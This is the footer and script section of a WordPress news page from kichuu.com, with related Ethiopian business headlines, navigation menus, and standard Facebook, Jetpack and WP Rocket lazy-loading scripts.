sizes="(max-width: 80px) 100vw, 80px" /></noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://kichuu.com/ethiopia-suspends-sale-of-telecom-firms-stake-sought-by-orange/" title="Ethiopia Suspends Sale of Telecom Firm’s Stake Sought by Orange">
										Ethiopia Suspends Sale of Telecom Firm’s Stake Sought by Orange									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://kichuu.com/2022/03/">March 18, 2022</a></span>
</div>
							</div>
						</li>						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-114198 post type-post status-publish format-standard has-post-thumbnail category-business">
															<figure class="mh-custom-posts-thumb">
									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://kichuu.com/ethiopia-living-cost-keeps-galloping/" title="Ethiopia: Living Cost Keeps Galloping"><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Living Cost" loading="lazy" data-lazy-srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/275473148_148310817659098_5701357889283612625_n-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/275473148_148310817659098_5701357889283612625_n-678x509.jpg 678w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/275473148_148310817659098_5701357889283612625_n-326x245.jpg 326w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/275473148_148310817659098_5701357889283612625_n-80x60.jpg" /><noscript><img width="80" height="60" src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/275473148_148310817659098_5701357889283612625_n-80x60.jpg" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Living Cost" loading="lazy" srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/275473148_148310817659098_5701357889283612625_n-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/275473148_148310817659098_5701357889283612625_n-678x509.jpg 678w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/275473148_148310817659098_5701357889283612625_n-326x245.jpg 326w" sizes="(max-width: 80px) 100vw, 80px" /></noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://kichuu.com/ethiopia-living-cost-keeps-galloping/" title="Ethiopia: Living Cost Keeps Galloping">
										Ethiopia: Living Cost Keeps Galloping									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://kichuu.com/2022/03/">March 11, 2022</a></span>
</div>
							</div>
						</li>						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-113792 post type-post status-publish format-standard has-post-thumbnail category-business">
															<figure class="mh-custom-posts-thumb">
									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://kichuu.com/ethiopia-works-to-obtain-foreign-investment/" title="Ethiopia works to obtain foreign investment"><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Foreign Investment" loading="lazy" data-lazy-srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/02/defd710fd307ff3fe77abbe8a4920f2a0c6c229a-80x60.webp 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/02/defd710fd307ff3fe77abbe8a4920f2a0c6c229a-326x245.webp 326w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/02/defd710fd307ff3fe77abbe8a4920f2a0c6c229a-80x60.webp" /><noscript><img width="80" height="60" src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/02/defd710fd307ff3fe77abbe8a4920f2a0c6c229a-80x60.webp" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Foreign Investment" loading="lazy" srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/02/defd710fd307ff3fe77abbe8a4920f2a0c6c229a-80x60.webp 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/02/defd710fd307ff3fe77abbe8a4920f2a0c6c229a-326x245.webp 326w" sizes="(max-width: 80px) 100vw, 80px" /></noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://kichuu.com/ethiopia-works-to-obtain-foreign-investment/" title="Ethiopia works to obtain foreign investment">
										Ethiopia works to obtain foreign investment									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://kichuu.com/2022/02/">February 28, 2022</a></span>
</div>
							</div>
						</li>			</ul></div></div>
</div>
</footer>
	<div class="mh-footer-nav-mobile"></div>
	<nav class="mh-navigation mh-footer-nav" itemscope="itemscope" itemtype="https://schema.org/SiteNavigationElement">
		<div class="mh-container mh-container-inner clearfix">
			<div class="menu-main_menu-container"><ul id="menu-main_menu-1" class="menu"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-48174"><a href="https://kichuu.com/">Home</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor menu-item-has-children menu-item-140"><a href="https://kichuu.com/category/news/">News</a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-162"><a href="https://kichuu.com/category/news/africa/">Africa</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-163"><a href="https://kichuu.com/category/news/world/">World</a></li>
</ul>
</li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-18343"><a href="https://kichuu.com/category/afaan-oromoo/">Afaan Oromoo</a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-18358"><a href="https://kichuu.com/category/afaan-oromoo/news-afaan-oromoo/">News</a></li>
	<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-18359"><a href="https://kichuu.com/category/afaan-oromoo/radio/">Radio</a></li>
	<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-18360"><a href="https://kichuu.com/category/afaan-oromoo/tv/">TV</a></li>
	<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-18362"><a href="https://kichuu.com/category/afaan-oromoo/videos/">Videos</a></li>
</ul>
</li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-18351"><a href="https://kichuu.com/category/amharic/">Amharic</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-18"><a href="https://kichuu.com/category/women/">Women</a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-231"><a href="https://kichuu.com/category/women/oromo/">Oromo</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-232"><a href="https://kichuu.com/category/women/other-women/">Other women</a></li>
</ul>
</li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-17"><a href="https://kichuu.com/category/health/">Health</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-764"><a href="https://kichuu.com/category/musics/">Musics</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-350"><a href="https://kichuu.com/category/sports/">Sports</a></li>
</ul></div>		</div>
	</nav>
<div class="mh-copyright-wrap">
	<div class="mh-container mh-container-inner clearfix">
		<p class="mh-copyright">
			Copyright @2016 kichuu.com              		</p>
	</div>
</div>
<a href="#" class="mh-back-to-top"><i class="fa fa-chevron-up"></i></a>
</div><!-- .mh-container-outer -->
			<div id="fb-root"></div>
			<script type="rocketlazyloadscript">
				(function(d, s, id){
					var js, fjs = d.getElementsByTagName(s)[0];
					if (d.getElementById(id)) return;
					js = d.createElement(s); js.id = id;
					js.src = "//connect.facebook.net/en_US/sdk.js#xfbml=1&version=v2.9";
					fjs.parentNode.insertBefore(js, fjs);
				}(document, 'script', 'facebook-jssdk'));
			</script> 		<div id="amp-mobile-version-switcher" hidden>
			<a rel="" href="https://kichuu.com/freedom-if-the-road-of-peace-is-closed-the-road-of-gun-will-be-opened/amp/">
				Go to mobile version			</a>
		</div>

				<script type="rocketlazyloadscript" data-rocket-type='text/javascript' src='https://r7b3p6q7.rocketcdn.me/wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.13.9' id='regenerator-runtime-js' defer></script>
<script type="rocketlazyloadscript" data-rocket-type='text/javascript' src='https://r7b3p6q7.rocketcdn.me/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0' id='wp-polyfill-js'></script>
<script type='text/javascript' id='contact-form-7-js-extra'>
/* <![CDATA[ */
var wpcf7 = {"api":{"root":"https:\/\/kichuu.com\/wp-json\/","namespace":"contact-form-7\/v1"},"cached":"1"};
/* ]]> */
</script>
<script type="rocketlazyloadscript" data-minify="1" data-rocket-type='text/javascript' src='https://r7b3p6q7.rocketcdn.me/wp-content/cache/min/1/wp-content/plugins/contact-form-7/includes/js/index.js?ver=1640736874' id='contact-form-7-js' defer></script>
<script type="rocketlazyloadscript" data-rocket-type='text/javascript' id='rocket-browser-checker-js-after'>
"use strict";var _createClass=function(){function defineProperties(target,props){for(var i=0;i<props.length;i++){var descriptor=props[i];descriptor.enumerable=descriptor.enumerable||!1,descriptor.configurable=!0,"value"in descriptor&&(descriptor.writable=!0),Object.defineProperty(target,descriptor.key,descriptor)}}return function(Constructor,protoProps,staticProps){return protoProps&&defineProperties(Constructor.prototype,protoProps),staticProps&&defineProperties(Constructor,staticProps),Constructor}}();function _classCallCheck(instance,Constructor){if(!(instance instanceof Constructor))throw new TypeError("Cannot call a class as a function")}var RocketBrowserCompatibilityChecker=function(){function RocketBrowserCompatibilityChecker(options){_classCallCheck(this,RocketBrowserCompatibilityChecker),this.passiveSupported=!1,this._checkPassiveOption(this),this.options=!!this.passiveSupported&&options}return _createClass(RocketBrowserCompatibilityChecker,[{key:"_checkPassiveOption",value:function(self){try{var options={get passive(){return!(self.passiveSupported=!0)}};window.addEventListener("test",null,options),window.removeEventListener("test",null,options)}catch(err){self.passiveSupported=!1}}},{key:"initRequestIdleCallback",value:function(){!1 in window&&(window.requestIdleCallback=function(cb){var start=Date.now();return setTimeout(function(){cb({didTimeout:!1,timeRemaining:function(){return Math.max(0,50-(Date.now()-start))}})},1)}),!1 in window&&(window.cancelIdleCallback=function(id){return clearTimeout(id)})}},{key:"isDataSaverModeOn",value:function(){return"connection"in navigator&&!0===navigator.connection.saveData}},{key:"supportsLinkPrefetch",value:function(){var elem=document.createElement("link");return elem.relList&&elem.relList.supports&&elem.relList.supports("prefetch")&&window.IntersectionObserver&&"isIntersecting"in IntersectionObserverEntry.prototype}},{key:"isSlowConnection",value:function(){return"connection"in navigator&&"effectiveType"in navigator.connection&&("2g"===navigator.connection.effectiveType||"slow-2g"===navigator.connection.effectiveType)}}]),RocketBrowserCompatibilityChecker}();
</script>
<script type='text/javascript' id='rocket-preload-links-js-extra'>
/* <![CDATA[ */
var RocketPreloadLinksConfig = {"excludeUris":"\/(?:.+\/)?feed(?:\/(?:.+\/?)?)?$|\/(?:.+\/)?embed\/|\/(index\\.php\/)?wp\\-json(\/.*|$)|\/wp-admin\/|\/logout\/|\/wp-login.php|\/refer\/|\/go\/|\/recommend\/|\/recommends\/","usesTrailingSlash":"1","imageExt":"jpg|jpeg|gif|png|tiff|bmp|webp|avif","fileExt":"jpg|jpeg|gif|png|tiff|bmp|webp|avif|php|pdf|html|htm","siteUrl":"https:\/\/kichuu.com","onHoverDelay":"100","rateThrottle":"3"};
/* ]]> */
</script>
<script type="rocketlazyloadscript" data-rocket-type='text/javascript' id='rocket-preload-links-js-after'>
(function() {
"use strict";var r="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},e=function(){function i(e,t){for(var n=0;n<t.length;n++){var i=t[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(e,i.key,i)}}return function(e,t,n){return t&&i(e.prototype,t),n&&i(e,n),e}}();function i(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}var t=function(){function n(e,t){i(this,n),this.browser=e,this.config=t,this.options=this.browser.options,this.prefetched=new Set,this.eventTime=null,this.threshold=1111,this.numOnHover=0}return e(n,[{key:"init",value:function(){!this.browser.supportsLinkPrefetch()||this.browser.isDataSaverModeOn()||this.browser.isSlowConnection()||(this.regex={excludeUris:RegExp(this.config.excludeUris,"i"),images:RegExp(".("+this.config.imageExt+")$","i"),fileExt:RegExp(".("+this.config.fileExt+")$","i")},this._initListeners(this))}},{key:"_initListeners",value:function(e){-1<this.config.onHoverDelay&&document.addEventListener("mouseover",e.listener.bind(e),e.listenerOptions),document.addEventListener("mousedown",e.listener.bind(e),e.listenerOptions),document.addEventListener("touchstart",e.listener.bind(e),e.listenerOptions)}},{key:"listener",value:function(e){var t=e.target.closest("a"),n=this._prepareUrl(t);if(null!==n)switch(e.type){case"mousedown":case"touchstart":this._addPrefetchLink(n);break;case"mouseover":this._earlyPrefetch(t,n,"mouseout")}}},{key:"_earlyPrefetch",value:function(t,e,n){var i=this,r=setTimeout(function(){if(r=null,0===i.numOnHover)setTimeout(function(){return i.numOnHover=0},1e3);else if(i.numOnHover>i.config.rateThrottle)return;i.numOnHover++,i._addPrefetchLink(e)},this.config.onHoverDelay);t.addEventListener(n,function e(){t.removeEventListener(n,e,{passive:!0}),null!==r&&(clearTimeout(r),r=null)},{passive:!0})}},{key:"_addPrefetchLink",value:function(i){return this.prefetched.add(i.href),new Promise(function(e,t){var n=document.createElement("link");n.rel="prefetch",n.href=i.href,n.onload=e,n.onerror=t,document.head.appendChild(n)}).catch(function(){})}},{key:"_prepareUrl",value:function(e){if(null===e||"object"!==(void 0===e?"undefined":r(e))||!1 in e||-1===["http:","https:"].indexOf(e.protocol))return null;var t=e.href.substring(0,this.config.siteUrl.length),n=this._getPathname(e.href,t),i={original:e.href,protocol:e.protocol,origin:t,pathname:n,href:t+n};return this._isLinkOk(i)?i:null}},{key:"_getPathname",value:function(e,t){var n=t?e.substring(this.config.siteUrl.length):e;return n.startsWith("/")||(n="/"+n),this._shouldAddTrailingSlash(n)?n+"/":n}},{key:"_shouldAddTrailingSlash",value:function(e){return this.config.usesTrailingSlash&&!e.endsWith("/")&&!this.regex.fileExt.test(e)}},{key:"_isLinkOk",value:function(e){return null!==e&&"object"===(void 0===e?"undefined":r(e))&&(!this.prefetched.has(e.href)&&e.origin===this.config.siteUrl&&-1===e.href.indexOf("?")&&-1===e.href.indexOf("#")&&!this.regex.excludeUris.test(e.href)&&!this.regex.images.test(e.href))}}],[{key:"run",value:function(){"undefined"!=typeof RocketPreloadLinksConfig&&new n(new RocketBrowserCompatibilityChecker({capture:!0,passive:!0}),RocketPreloadLinksConfig).init()}}]),n}();t.run();
}());
</script>
<script type="rocketlazyloadscript" data-rocket-type='text/javascript' src='https://r7b3p6q7.rocketcdn.me/wp-includes/js/comment-reply.min.js?ver=5.9.2' id='comment-reply-js' defer></script>
<script src='https://stats.wp.com/e-202212.js' defer></script>
<script>
	_stq = window._stq || [];
	_stq.push([ 'view', {v:'ext',j:'1:10.7',blog:'111820558',post:'114611',tz:'-4',srv:'kichuu.com'} ]);
	_stq.push([ 'clickTrackerInit', '111820558', '114611' ]);
</script>
<script>window.lazyLoadOptions={elements_selector:"img[data-lazy-src],.rocket-lazyload,iframe[data-lazy-src]",data_src:"lazy-src",data_srcset:"lazy-srcset",data_sizes:"lazy-sizes",class_loading:"lazyloading",class_loaded:"lazyloaded",threshold:300,callback_loaded:function(element){if(element.tagName==="IFRAME"&&element.dataset.rocketLazyload=="fitvidscompatible"){if(element.classList.contains("lazyloaded")){if(typeof window.jQuery!="undefined"){if(jQuery.fn.fitVids){jQuery(element).parent().fitVids()}}}}}};window.addEventListener('LazyLoad::Initialized',function(e){var lazyLoadInstance=e.detail.instance;if(window.MutationObserver){var observer=new MutationObserver(function(mutations){var image_count=0;var iframe_count=0;var rocketlazy_count=0;mutations.forEach(function(mutation){for(var i=0;i<mutation.addedNodes.length;i++){if(typeof mutation.addedNodes[i].getElementsByTagName!=='function'){continue}
if(typeof mutation.addedNodes[i].getElementsByClassName!=='function'){continue}
images=mutation.addedNodes[i].getElementsByTagName('img');is_image=mutation.addedNodes[i].tagName=="IMG";iframes=mutation.addedNodes[i].getElementsByTagName('iframe');is_iframe=mutation.addedNodes[i].tagName=="IFRAME";rocket_lazy=mutation.addedNodes[i].getElementsByClassName('rocket-lazyload');image_count+=images.length;iframe_count+=iframes.length;rocketlazy_count+=rocket_lazy.length;if(is_image){image_count+=1}
if(is_iframe){iframe_count+=1}}});if(image_count>0||iframe_count>0||rocketlazy_count>0){lazyLoadInstance.update()}});var b=document.getElementsByTagName("body")[0];var config={childList:!0,subtree:!0};observer.observe(b,config)}},!1)</script><script data-no-minify="1" async src="https://r7b3p6q7.rocketcdn.me/wp-content/plugins/wp-rocket/assets/js/lazyload/17.5/lazyload.min.js"></script><script>function lazyLoadThumb(e){var t='<img data-lazy-src="https://i.ytimg.com/vi/ID/hqdefault.jpg" alt="" width="480" height="360"><noscript><img src="https://i.ytimg.com/vi/ID/hqdefault.jpg" alt="" width="480" height="360"></noscript>',a='<button class="play" aria-label="play Youtube video"></button>';return t.replace("ID",e)+a}function lazyLoadYoutubeIframe(){var e=document.createElement("iframe"),t="ID?autoplay=1";t+=0===this.parentNode.dataset.query.length?'':'&'+this.parentNode.dataset.query;e.setAttribute("src",t.replace("ID",this.parentNode.dataset.src)),e.setAttribute("frameborder","0"),e.setAttribute("allowfullscreen","1"),e.setAttribute("allow", "accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture"),this.parentNode.parentNode.replaceChild(e,this.parentNode)}document.addEventListener("DOMContentLoaded",function(){var e,t,p,a=document.getElementsByClassName("rll-youtube-player");for(t=0;t<a.length;t++)e=document.createElement("div"),e.setAttribute("data-id",a[t].dataset.id),e.setAttribute("data-query", a[t].dataset.query),e.setAttribute("data-src", a[t].dataset.src),e.innerHTML=lazyLoadThumb(a[t].dataset.id),a[t].appendChild(e),p=e.querySelector('.play'),p.onclick=lazyLoadYoutubeIframe});</script><script type="rocketlazyloadscript">"use strict";function wprRemoveCPCSS(){var preload_stylesheets=document.querySelectorAll('link[data-rocket-async="style"][rel="preload"]');if(preload_stylesheets&&0<preload_stylesheets.length)for(var stylesheet_index=0;stylesheet_index<preload_stylesheets.length;stylesheet_index++){var media=preload_stylesheets[stylesheet_index].getAttribute("media")||"all";if(window.matchMedia(media).matches)return void setTimeout(wprRemoveCPCSS,200)}var elem=document.getElementById("rocket-critical-css");elem&&"remove"in elem&&elem.remove()}window.addEventListener?window.addEventListener("load",wprRemoveCPCSS):window.attachEvent&&window.attachEvent("onload",wprRemoveCPCSS);</script><noscript><link rel="stylesheet" href="https://r7b3p6q7.rocketcdn.me/wp-content/cache/min/1/36e96eba98309a8222ac287ffb6878ff.css" media="all" data-minify="1" /></noscript></body>
</html><script type="rocketlazyloadscript" data-minify="1" src='https://r7b3p6q7.rocketcdn.me/wp-content/cache/min/1/close.js?ver=1647786664' data-rocket-type='text/javascript' defer></script>
<!-- This website is like a Rocket, isn't it? Performance optimized by WP Rocket. Learn more: https://wp-rocket.me - Debug: cached@1647837478 -->